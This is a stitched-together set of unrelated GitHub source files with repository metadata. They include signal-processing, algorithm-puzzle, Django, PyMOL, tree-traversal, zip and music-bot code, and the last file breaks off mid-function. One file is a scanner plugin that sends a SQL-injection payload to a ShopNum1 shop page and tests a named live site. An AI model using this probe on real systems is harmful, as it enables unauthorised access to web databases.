import numpy
#from operator import add
#import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
    """
    GRAS block emitting samples of a second-order exponential step
    response: a constant term gama/(alpha*beta) plus two decaying
    exponentials in alpha and beta.
    """
    def __init__(self):
        gras.Block.__init__(self,
            name="expo",
            in_sig=[numpy.float32],
            out_sig=[numpy.float32])

    def set_parameters(self, g, a, b):
        # overall gain and the two exponential rate constants
        self.gama = g
        self.alpha = a
        self.beta = b

    def yield_times(self):
        """Generator of second-stamps spaced 0.5 s apart, from midnight."""
        from datetime import date, time, datetime, timedelta
        start = datetime.combine(date.today(), time(0, 0))
        yield start.strftime("%S")
        while True:
            start += timedelta(seconds=0.5)
            yield start.strftime("%S")

    def work(self, input_items, output_items):
        # Evaluate the three response terms at t = 0..19 and sum them.
        # (Dead commented-out experiments and the unused time-stamp loop
        # from the original draft were removed.)
        o1 = []
        o2 = []
        o3 = []
        ans = []
        for i in range(0, 20):
            o1.append((self.gama)/(self.alpha*self.beta))
            o2.append(((self.gama)*(numpy.exp(-(self.alpha*i)))/(self.alpha*(self.beta-self.alpha))))
            o3.append(((self.gama)*(numpy.exp(-(self.beta*i)))/(self.beta*(self.alpha-self.beta))))
            ans.append(o1[i]+o2[i]+o3[i])
        # BUG FIX: the original had a dangling assignment "a =" (a syntax
        # error) inside this loop; the surrounding code clearly intended to
        # emit the i-th summed sample, one per produce() call.
        for i in range(0, 20):
            a = ans[i]
            output_items[0][:1] = a
            self.consume(0, 1)
            self.produce(0, 1)
|
[
"imushir@gmail.com"
] |
imushir@gmail.com
|
|
923a73b286091e48661d2498f48f73f6650f64ed
|
e35fd52fe4367320024a26f2ee357755b5d5f4bd
|
/leetcode/problems/74.search-a-2d-matrix.py
|
1569ac34b90c9406f662f03ef22de36da49b9a0d
|
[] |
no_license
|
liseyko/CtCI
|
a451967b0a0ce108c491d30b81e88d20ad84d2cd
|
c27f19fac14b4acef8c631ad5569e1a5c29e9e1f
|
refs/heads/master
| 2020-03-21T14:28:47.621481
| 2019-11-12T22:59:07
| 2019-11-12T22:59:07
| 138,658,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
#
# @lc app=leetcode id=74 lang=python3
#
# [74] Search a 2D Matrix
#
# https://leetcode.com/problems/search-a-2d-matrix/description/
#
# algorithms
# Medium (35.49%)
# Total Accepted: 262.2K
# Total Submissions: 738.7K
# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,50]]\n3'
#
# Write an efficient algorithm that searches for a value in an m x n matrix.
# This matrix has the following properties:
#
#
# Integers in each row are sorted from left to right.
# The first integer of each row is greater than the last integer of the
# previous row.
#
#
# Example 1:
#
#
# Input:
# matrix = [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# target = 3
# Output: true
#
#
# Example 2:
#
#
# Input:
# matrix = [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# target = 13
# Output: false
#
#
class Solution:
    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
        """Return True if *target* occurs in the row-sorted matrix.

        BUG FIX: the method body was missing entirely (an unimplemented
        stub).  Because each row is sorted and every row starts above the
        previous row's end, the matrix is one sorted sequence of m*n
        values -- a single binary search over flat indices suffices, with
        index k mapping to matrix[k // n][k % n].  O(log(m*n)) time.
        """
        if not matrix or not matrix[0]:
            # empty matrix (or matrix of empty rows) contains nothing
            return False
        n = len(matrix[0])
        lo, hi = 0, len(matrix) * n - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            val = matrix[mid // n][mid % n]
            if val == target:
                return True
            if val < target:
                lo = mid + 1
            else:
                hi = mid - 1
        return False
|
[
"liseyko@gmail.com"
] |
liseyko@gmail.com
|
ca3cd643be45c6a9a5f944743ece02ac4fc85764
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_53/567.py
|
05e6ad00cbf4b7bba63051f353ec913a4811d281
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
#!/usr/bin/python
import sys
def snapper(n, k):
	"""Return True when the low n bits of k are all set (snapper chain ON)."""
	mask = (1 << n) - 1
	return (k & mask) == mask
# Python 2 driver: read the case count, then one "N K" pair per line.
num_entries = input()
entries = []
c = 0
while c < num_entries:
	s = sys.stdin.readline()
	entries.append(map(int, s.split(' ')))
	c += 1
c = 0
# The snapper chain lights the bulb iff the low N bits of K are all set.
while c < num_entries:
	if snapper(entries[c][0], entries[c][1]):
		print "Case #" + str(c+1) + ": ON"
	else:
		print "Case #" + str(c+1) + ": OFF"
	c += 1
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
ddeea8ef6ffc46729b0a8139f950b546b159e1ae
|
91fe4b06b331be287518731614067e5d65a85e82
|
/GetNearestAgents/GetNearestAgents/urls.py
|
a01a6b849148b911ca3a3fc6124c09c422da1e18
|
[] |
no_license
|
Niharika3128/GetAgentsByNearestLocations
|
e8b1af4dc011efb4ff0e79383478333747ff2a22
|
9e954344e50a3f92d40fd3aa7810569c727f0c46
|
refs/heads/master
| 2022-12-16T04:57:45.667615
| 2020-09-11T18:32:59
| 2020-09-11T18:32:59
| 294,387,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
"""GetNearestAgents URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path, re_path
from django.views.generic import TemplateView

from agents import views
urlpatterns = [
    # path('admin/', admin.site.urls),
    path('', TemplateView.as_view(template_name='home.html'), name='main'),
    path('locations/', views.getNearestLocations, name='locations'),
    # BUG FIX: ``path()`` treats its route literally and never interprets
    # regex, so the original 'get_page/(?P<pno>\\d+)/...' route could not
    # match any URL.  ``re_path()`` restores the intended regex matching.
    re_path(r'^get_page/(?P<pno>\d+)/(?P<id>\d)/$', views.getNearestLocations, name='get_page'),
]
|
[
"niharika5475@gmail.com"
] |
niharika5475@gmail.com
|
3edaba52aa526852e5576903a2ca6d968a293149
|
18305efd1edeb68db69880e03411df37fc83b58b
|
/pdb_files_1000rot/qp/1qpe/tractability_500/pymol_results_file.py
|
ba2530e6b7d97a0245b21db20af8a6d3f359eb47
|
[] |
no_license
|
Cradoux/hotspot_pipline
|
22e604974c8e38c9ffa979092267a77c6e1dc458
|
88f7fab8611ebf67334474c6e9ea8fc5e52d27da
|
refs/heads/master
| 2021-11-03T16:21:12.837229
| 2019-03-28T08:31:39
| 2019-03-28T08:31:39
| 170,106,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,204
|
py
|
from os.path import join
import tempfile
import zipfile
from pymol import cmd, finish_launching
from pymol.cgo import *
finish_launching()
dirpath = None
def cgo_arrow(atom1='pk1', atom2='pk2', radius=0.07, gap=0.0, hlength=-1, hradius=-1, color='blue red', name=''):
    """Build a CGO arrow (cylinder shaft + cone head) from atom1 to atom2.

    Endpoints may be PyMOL selections, coordinate triples, or "[x,y,z]"
    strings.  ``color`` is one colour name or two space-separated names
    (shaft / head).  Negative hlength/hradius auto-size the head from the
    shaft radius.  Returns the CGO primitive list; ``name`` is unused here.
    """
    from chempy import cpv
    radius, gap = float(radius), float(gap)
    hlength, hradius = float(hlength), float(hradius)
    # a single colour name means shaft and head share it
    try:
        color1, color2 = color.split()
    except:
        color1 = color2 = color
    color1 = list(cmd.get_color_tuple(color1))
    color2 = list(cmd.get_color_tuple(color2))
    def get_coord(v):
        # accept raw coordinates, "[x,y,z]" literals, or atom selections
        if not isinstance(v, str):
            return v
        if v.startswith('['):
            return cmd.safe_list_eval(v)
        return cmd.get_atom_coords(v)
    xyz1 = get_coord(atom1)
    xyz2 = get_coord(atom2)
    normal = cpv.normalize(cpv.sub(xyz1, xyz2))
    # auto-size the arrow head relative to the shaft
    if hlength < 0:
        hlength = radius * 3.0
    if hradius < 0:
        hradius = hlength * 0.6
    # shrink both ends inward by `gap` along the arrow axis
    if gap:
        diff = cpv.scale(normal, gap)
        xyz1 = cpv.sub(xyz1, diff)
        xyz2 = cpv.add(xyz2, diff)
    # xyz3 is where the shaft ends and the cone head begins
    xyz3 = cpv.add(cpv.scale(normal, hlength), xyz2)
    obj = [cgo.CYLINDER] + xyz1 + xyz3 + [radius] + color1 + color2 + [cgo.CONE] + xyz3 + xyz2 + [hradius, 0.0] + color2 + color2 + [1.0, 0.0]
    return obj
dirpath = tempfile.mkdtemp()
zip_dir = 'out.zip'
with zipfile.ZipFile(zip_dir) as hs_zip:
hs_zip.extractall(dirpath)
cmd.load(join(dirpath,"protein.pdb"), "protein")
cmd.show("cartoon", "protein")
if dirpath:
f = join(dirpath, "label_threshold_10.mol2")
else:
f = "label_threshold_10.mol2"
cmd.load(f, 'label_threshold_10')
cmd.hide('everything', 'label_threshold_10')
cmd.label("label_threshold_10", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_14.mol2")
else:
f = "label_threshold_14.mol2"
cmd.load(f, 'label_threshold_14')
cmd.hide('everything', 'label_threshold_14')
cmd.label("label_threshold_14", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_17.mol2")
else:
f = "label_threshold_17.mol2"
cmd.load(f, 'label_threshold_17')
cmd.hide('everything', 'label_threshold_17')
cmd.label("label_threshold_17", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
colour_dict = {'acceptor':'red', 'donor':'blue', 'apolar':'yellow', 'negative':'purple', 'positive':'cyan'}
threshold_list = [10, 14, 17]
gfiles = ['donor.grd', 'apolar.grd', 'acceptor.grd']
grids = ['donor', 'apolar', 'acceptor']
num = 0
surf_transparency = 0.2
if dirpath:
gfiles = [join(dirpath, g) for g in gfiles]
# For every threshold, render each energy grid as a coloured, partially
# transparent isosurface, then group surfaces and labels per threshold
# and attach everything to the hotspot group.
for t in threshold_list:
    for i in range(len(grids)):
        try:
            cmd.load(r'%s'%(gfiles[i]), '%s_%s'%(grids[i], str(num)))
            cmd.isosurface('surface_%s_%s_%s'%(grids[i], t, num), '%s_%s'%(grids[i], num), t)
            cmd.set('transparency', surf_transparency, 'surface_%s_%s_%s'%(grids[i], t, num))
            cmd.color(colour_dict['%s'%(grids[i])], 'surface_%s_%s_%s'%(grids[i], t, num))
            cmd.group('threshold_%s'%(t), members = 'surface_%s_%s_%s'%(grids[i],t, num))
            cmd.group('threshold_%s' % (t), members='label_threshold_%s' % (t))
        except:
            # missing grid files / failed isosurfaces are skipped silently
            continue
    try:
        cmd.group('hotspot_%s' % (num), members='threshold_%s' % (t))
    except:
        continue
for g in grids:
    cmd.group('hotspot_%s' % (num), members='%s_%s' % (g,num))
cluster_dict = {"16.1944999695":[], "16.1944999695_arrows":[]}
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(18.0), float(37.5), float(84.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([18.0,37.5,84.5], [16.732,39.933,86.734], color="blue red", name="Arrows_16.1944999695_1")
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(21.0), float(34.0), float(86.0), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([21.0,34.0,86.0], [20.128,33.403,83.414], color="blue red", name="Arrows_16.1944999695_2")
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(35.0), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,35.0,82.5], [20.128,33.403,83.414], color="blue red", name="Arrows_16.1944999695_3")
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(40.5), float(86.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,40.5,86.5], [20.326,41.875,84.711], color="blue red", name="Arrows_16.1944999695_4")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 1.000, 0.000] + [ALPHA, 0.6] + [SPHERE, float(24.6252880167), float(37.7325779305), float(84.4628325968), float(1.0)]
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(19.0), float(38.5), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([19.0,38.5,82.5], [17.965,41.525,82.457], color="red blue", name="Arrows_16.1944999695_5")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(20.0), float(36.0), float(83.0), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([20.0,36.0,83.0], [20.128,33.403,83.414], color="red blue", name="Arrows_16.1944999695_6")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(19.5), float(38.5), float(86.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([19.5,38.5,86.5], [16.732,39.933,86.734], color="red blue", name="Arrows_16.1944999695_7")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(39.5), float(83.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,39.5,83.5], [20.326,41.875,84.711], color="red blue", name="Arrows_16.1944999695_8")
cluster_dict["16.1944999695"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(24.5), float(34.5), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([24.5,34.5,82.5], [24.977,33.392,79.234], color="red blue", name="Arrows_16.1944999695_9")
cmd.load_cgo(cluster_dict["16.1944999695"], "Features_16.1944999695", 1)
cmd.load_cgo(cluster_dict["16.1944999695_arrows"], "Arrows_16.1944999695")
cmd.set("transparency", 0.2,"Features_16.1944999695")
cmd.group("Pharmacophore_16.1944999695", members="Features_16.1944999695")
cmd.group("Pharmacophore_16.1944999695", members="Arrows_16.1944999695")
if dirpath:
f = join(dirpath, "label_threshold_16.1944999695.mol2")
else:
f = "label_threshold_16.1944999695.mol2"
cmd.load(f, 'label_threshold_16.1944999695')
cmd.hide('everything', 'label_threshold_16.1944999695')
cmd.label("label_threshold_16.1944999695", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
cmd.group('Pharmacophore_16.1944999695', members= 'label_threshold_16.1944999695')
cmd.bg_color("white")
cmd.show("cartoon", "protein")
cmd.color("slate", "protein")
cmd.show("sticks", "organic")
cmd.hide("lines", "protein")
|
[
"cradoux.cr@gmail.com"
] |
cradoux.cr@gmail.com
|
57563df581ac1c0a00ac5c91318c1352f0584a59
|
8336ea48994f9ecbddd9caf853d08f05b2e4c15c
|
/-二叉树-遍历.py
|
c2e78d315571c82f3bca1e8199f2110b88a3277b
|
[] |
no_license
|
swain-s/lc
|
fb2058931853b83aeb0737447a67e2fee08fdacd
|
9e793935b999540e20e6c7f025f3f765f43039af
|
refs/heads/master
| 2021-01-09T00:33:23.943824
| 2020-04-06T11:50:38
| 2020-04-06T11:50:38
| 242,172,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,498
|
py
|
# 问题描述:二叉树的前序、中序、后续和层次遍历
# 模板: 7
# 3 10
# 1 5 9 12
# 4 14
#
from a_bin_tree import root, tin_travel
class TreeNode(object):
    """A binary-tree node: a payload value plus two child links."""

    def __init__(self, val):
        self.val = val      # node payload
        self.left = None    # left child (TreeNode or None)
        self.right = None   # right child (TreeNode or None)
class BinTreeTreveral(object):
    """Binary-tree traversals: recursive and iterative DFS plus BFS.

    Nodes only need ``val``, ``left`` and ``right`` attributes.
    (Original Chinese comments translated to English.)
    """

    def __init__(self):
        pass

    def pre_order_traveral(self, root, output):
        """Recursive pre-order (root, left, right); appends to *output*."""
        if root == None:
            return
        output.append(root.val)
        self.pre_order_traveral(root.left, output)
        self.pre_order_traveral(root.right, output)

    def pre_order_traveral_stack(self, root):
        """Iterative pre-order using an explicit stack; returns a new list."""
        output = []
        if root == None:
            return output
        stack = []
        cur = root
        while cur or len(stack) > 0:
            if cur:
                stack.append(cur)
                output.append(cur.val)  # visit before descending left
                cur = cur.left
            else:
                cur = stack.pop()
                cur = cur.right
        return output

    def in_order_traveral(self, root, output):
        """Recursive in-order (left, root, right); appends to *output*."""
        if root == None:
            return
        self.in_order_traveral(root.left, output)
        output.append(root.val)
        self.in_order_traveral(root.right, output)

    def in_order_traveral_stack(self, root):
        """Iterative in-order using an explicit stack; returns a new list."""
        output = []
        if root == None:
            return output
        stack = []
        cur = root
        while cur or len(stack) > 0:
            if cur:
                stack.append(cur)
                cur = cur.left
            else:
                cur = stack.pop()
                output.append(cur.val)  # visit after the left subtree
                cur = cur.right
        return output

    def post_order_traveral(self, root, output):
        """Recursive post-order (left, right, root); appends to *output*."""
        if root == None:
            return
        self.post_order_traveral(root.left, output)
        self.post_order_traveral(root.right, output)
        output.append(root.val)

    def level_order_traveral(self, root):
        """Breadth-first (level-order) traversal; returns a new list.

        BUG FIX: this method was an unimplemented ``pass`` stub that
        always returned None; it now visits nodes level by level.
        """
        output = []
        if root == None:
            return output
        queue = [root]
        head = 0  # list-as-queue with a moving head index (no deque import)
        while head < len(queue):
            node = queue[head]
            head += 1
            output.append(node.val)
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        return output
if __name__ == "__main__":
    # Smoke test: run every traversal on the sample tree imported from
    # a_bin_tree and print the visit orders for manual comparison.
    S = BinTreeTreveral()
    pre_arr = []
    S.pre_order_traveral(root, pre_arr)
    print(pre_arr)
    pre_arr_stack = []  # NOTE(review): unused; the stack variant returns its list
    print(S.pre_order_traveral_stack(root))
    in_arr = []
    S.in_order_traveral(root, in_arr)
    print(in_arr)
    in_arr_stack = []  # NOTE(review): unused, same as above
    print(S.in_order_traveral_stack(root))
    post_arr = []
    S.post_order_traveral(root, post_arr)
    print(post_arr)
|
[
"shenkun@bupt.edu.cn"
] |
shenkun@bupt.edu.cn
|
6b986ebc0f99796b46a53f789dadc82ecf2fcd69
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_forgivable.py
|
17e88f7334c72b963bdb051e7591385f4638ce97
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
#calss header
class _FORGIVABLE():
def __init__(self,):
self.name = "FORGIVABLE"
self.definitions = [u'used to say that you can forgive something because you understand it: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
b8709d1ed22fe57824a0b3ea1da243b08abaeccc
|
e281ce2330656a6a0a7f795f535f78881df8b5ba
|
/Python Study/Backup All the file/Common/ZipFile.py
|
c11a684f7044dbb2a6408fa18934115512d93791
|
[] |
no_license
|
sunruihua0522/SIG-PyCode
|
70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e
|
483a67bf679f54ab7405c2362d9cfe47daa2bc0f
|
refs/heads/master
| 2020-07-12T14:46:32.588227
| 2020-04-02T04:37:02
| 2020-04-02T04:37:02
| 204,842,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
import zipfile
import os
from tqdm import tqdm
class ZipFile:
    """Static helpers for zipping directories and filtered file lists."""

    @staticmethod
    def zipDir(dirpath, outFullName):
        """Compress the whole directory *dirpath* into *outFullName* (.zip).

        Archive entries are stored relative to *dirpath* so the root
        folder itself is not embedded in the archive paths.
        """
        # FIX: use a context manager so the archive is closed even on
        # error, and avoid shadowing the builtin ``zip``.
        with zipfile.ZipFile(outFullName, "w", zipfile.ZIP_DEFLATED) as zf:
            for path, dirnames, filenames in os.walk(dirpath):
                # strip the root prefix so entries are relative
                fpath = path.replace(dirpath, '')
                for filename in tqdm(filenames, ncols=50):
                    zf.write(os.path.join(path, filename), os.path.join(fpath, filename))

    @staticmethod
    def ZipFile(fileModelInfoLIst):
        """Zip each directory entry of *fileModelInfoLIst* into PathDes.

        :param fileModelInfoLIst: array of fileModelInfo objects; file
            entries are skipped, directory entries are archived.  Only
            paths listed in the entry's ``ListIn`` are included.
        """
        for l in fileModelInfoLIst:
            if l.IsFile():
                continue  # only directories are archived
            strPre = l.Root.split('\\')[-1]  # archive name = last path part
            if not os.path.exists(l.PathDes):
                os.makedirs(l.PathDes)
            with zipfile.ZipFile(os.path.join(l.PathDes, '%s.zip' % strPre), "w", zipfile.ZIP_DEFLATED) as zf:
                for path, dirnames, filenames in os.walk(l.FullName):
                    fpath = path.replace(l.FullName, '')
                    for filename in tqdm(filenames, ncols=50):
                        # include the file when its directory, or the file
                        # itself, is whitelisted in ListIn
                        in_listed_dir = any(x.FullName == path for x in l.ListIn)
                        is_listed_file = any(os.path.join(path, filename) == y.FullName for y in l.ListIn)
                        if in_listed_dir or is_listed_file:
                            zf.write(os.path.join(path, filename), os.path.join(fpath, filename))
|
[
"--global"
] |
--global
|
b0122bfe88e38f332099985954a6a5d8bd7fda29
|
427ab1f7f7fe08f76fab6468f6ea24dc5bc2701d
|
/bugscan/exp-2424.py
|
c8dd3e9935415447b4bce32457f6ae74829b5ecb
|
[] |
no_license
|
gayhub-blackerie/poc
|
b852b2bcdba78185efd68817c31579247c6e4b83
|
8b7c95d765deb450c029a921031eb1c90418f2a7
|
refs/heads/master
| 2021-07-24T03:05:52.697820
| 2017-11-04T10:33:51
| 2017-11-04T10:33:51
| 107,093,079
| 1
| 0
| null | 2017-10-16T07:31:31
| 2017-10-16T07:31:31
| null |
UTF-8
|
Python
| false
| false
| 761
|
py
|
#!/usr/bin/evn python
#--coding:utf-8--*--
#Name: shopnum1注入3
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0118352
#Author:xq17
def assign(service, arg):
    """Dispatch hook: claim the task only when targeting 'shopnum1'."""
    return (True, arg) if service == "shopnum1" else None
def audit(arg):
    """Probe *arg* for the ShopNum1 SQL injection (wooyun-2015-0118352).

    Appends an error-based payload to ProductListCategory.html; the
    CHAR() concatenation decodes to '~testXQ17', so seeing 'testXQ17'
    in a 200 response proves the database evaluated the injection.
    """
    payload = "ProductListCategory.html?BrandGuid=ac69ddd9-3900-43b0-939b-3b1d438ca190%27%20and%20(CHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(88)%2BCHAR(81)%2BCHAR(49)%2BCHAR(55))%3E0--"
    url=arg+payload
    code, head, res, errcode,finalurl = curl.curl(url)
    if code == 200 and "testXQ17" in res:
        security_hole('find sql injection: ' + arg)
if __name__ == '__main__':
    # standalone smoke test: run the probe against the demo site using
    # the stubbed helpers from the scanner's dummy module
    from dummy import *
    audit(assign("shopnum1","http://www.dapeng.net/")[1])
|
[
"hackerlq@gmail.com"
] |
hackerlq@gmail.com
|
778ffa1ac232b1d139916fb722187dabf44fc75f
|
5f0a72ccc780a9649c6adb15ccab6ddcb02a146b
|
/marshmallow/core/mechanics/music.py
|
644a8e26dbbecfa004973ebc4fe8d6f3d4eccc2c
|
[] |
no_license
|
bretzle/Marshmallow-Bot
|
1eb020bdf910bd29b324a79a0ee1b094d13f72fc
|
72175c0f58e36c7b6325a6cb2224731434781aca
|
refs/heads/master
| 2021-09-01T16:56:23.727278
| 2017-12-28T01:11:15
| 2017-12-28T01:11:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,414
|
py
|
import asyncio
import functools
import hashlib
import os
from asyncio.queues import Queue
from concurrent.futures import ThreadPoolExecutor
import discord
import youtube_dl
# Shared youtube-dl configuration: extract best-quality audio only, use
# filesystem-safe names, stay quiet, and let plain text queries resolve
# via the default search provider.
ytdl_params = {
    'format': 'bestaudio/best',
    'extractaudio': True,
    'audioformat': 'mp3',
    'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
    'restrictfilenames': True,
    'noplaylist': False,
    'nocheckcertificate': True,
    'ignoreerrors': True,
    'logtostderr': False,
    'quiet': True,
    'no_warnings': True,
    'default_search': 'auto',
    'source_address': '0.0.0.0'
}
class QueueItem(object):
    """A single queued track: youtube-dl metadata plus download state."""

    def __init__(self, requester, item_info):
        self.requester = requester  # who queued the track
        self.item_info = item_info  # raw youtube-dl info dict
        self.url = self.item_info['webpage_url']
        self.video_id = self.item_info['id']
        if 'uploader' in self.item_info:
            self.uploader = self.item_info['uploader']
        else:
            self.uploader = 'Unknown'
        self.title = self.item_info['title']
        if 'thumbnail' in self.item_info:
            self.thumbnail = self.item_info['thumbnail']
        else:
            self.thumbnail = 'https://i.imgur.com/CGPNJDT.png'  # fallback art
        self.duration = int(self.item_info['duration'])
        self.downloaded = False
        self.loop = asyncio.get_event_loop()
        self.threads = ThreadPoolExecutor(2)  # offloads blocking ytdl work
        self.ytdl_params = ytdl_params
        self.ytdl = youtube_dl.YoutubeDL(self.ytdl_params)
        self.token = self.tokenize()  # stable cache-file name
        self.location = None  # set once the file exists on disk

    def tokenize(self):
        # md5 of "yt_<video_id>" -> deterministic cache filename
        name = 'yt_' + self.video_id
        crypt = hashlib.new('md5')
        crypt.update(name.encode('utf-8'))
        final = crypt.hexdigest()
        return final

    async def download(self):
        # download into cache/<token> unless it is already cached
        out_location = f'cache/{self.token}'
        if not os.path.exists(out_location):
            self.ytdl.params['outtmpl'] = out_location
            task = functools.partial(self.ytdl.extract_info, self.url)
            # run the blocking youtube-dl call off the event loop
            await self.loop.run_in_executor(self.threads, task)
        self.downloaded = True
        self.location = out_location

    async def create_player(self, voice_client):
        """Ensure the track is downloaded, then start playback if idle."""
        await self.download()
        audio_source = discord.FFmpegPCMAudio(self.location)
        if not voice_client.is_playing():
            voice_client.play(audio_source)
class MusicCore(object):
    """Per-bot music state: one playback queue per guild plus yt-dl helpers."""

    def __init__(self, bot):
        self.bot = bot
        self.db = bot.db
        self.loop = asyncio.get_event_loop()
        self.threads = ThreadPoolExecutor(2)
        # guild_id -> asyncio.Queue of pending QueueItems
        self.queues = {}
        # guild_id -> current item; NOTE(review): not touched in this class,
        # presumably maintained by callers -- confirm.
        self.currents = {}
        # NOTE(review): presumably guild ids with repeat mode on -- confirm.
        self.repeaters = []
        self.ytdl_params = ytdl_params
        self.ytdl = youtube_dl.YoutubeDL(self.ytdl_params)

    async def extract_info(self, url):
        """Resolve ``url`` metadata with youtube_dl (download=False) off the loop."""
        task = functools.partial(self.ytdl.extract_info, url, False)
        information = await self.loop.run_in_executor(self.threads, task)
        return information

    def get_queue(self, guild_id):
        """Return the queue for ``guild_id``, creating and caching one if absent."""
        if guild_id in self.queues:
            queue = self.queues[guild_id]
        else:
            queue = Queue()
            self.queues.update({guild_id: queue})
        return queue

    @staticmethod
    async def listify_queue(queue):
        """Return the queue's contents as a list without consuming them.

        Drains every item, then re-enqueues each one in the original order.
        """
        item_list = []
        while not queue.empty():
            item = await queue.get()
            item_list.append(item)
        for item in item_list:
            await queue.put(item)
        return item_list
|
[
"johnfish218@gmail.com"
] |
johnfish218@gmail.com
|
1f69cce9ab69c9327883e50c082b673410e47b63
|
57dfd89d63b3b52eed144653c8264d50fa9fba6e
|
/miembros/api.py
|
faf4e4a8eaed9ebaf9a89ff12fa7d84346885925
|
[] |
no_license
|
geovanniberdugo/siiom
|
c850620214a1a3b8b1fc83ab895c0601241da3b4
|
5e2b72aff7ac5e94a93b7575603114b4ea5f628a
|
refs/heads/main
| 2023-02-16T15:02:30.539674
| 2021-01-15T22:29:36
| 2021-01-15T22:29:36
| 330,036,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
from django.contrib.auth.decorators import permission_required
from django.utils.translation import ugettext as _
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.http import JsonResponse
from .forms import DesvincularLiderGrupoForm, ResetearContrasenaAdminForm
from .models import Miembro
from .decorators import user_is_cabeza_red
from common.decorators import login_required_api
from common import constants
from common.api import get_error_forms_to_json
@login_required_api
@user_is_cabeza_red  # no JSON support in this decorator
def desvincular_lider_grupo_api(request, pk):
    """
    Unlink a leader from a friendship group (grupo de amistad).

    POST only. On success returns the member's edit-profile URL as JSON;
    on form errors returns the serialized errors; any other method gets a
    RESPONSE_DENIED code.
    """
    # Only members that currently belong to a group qualify.
    miembro = get_object_or_404(Miembro.objects.filter(grupo__isnull=False), pk=pk)
    if request.method == 'POST':
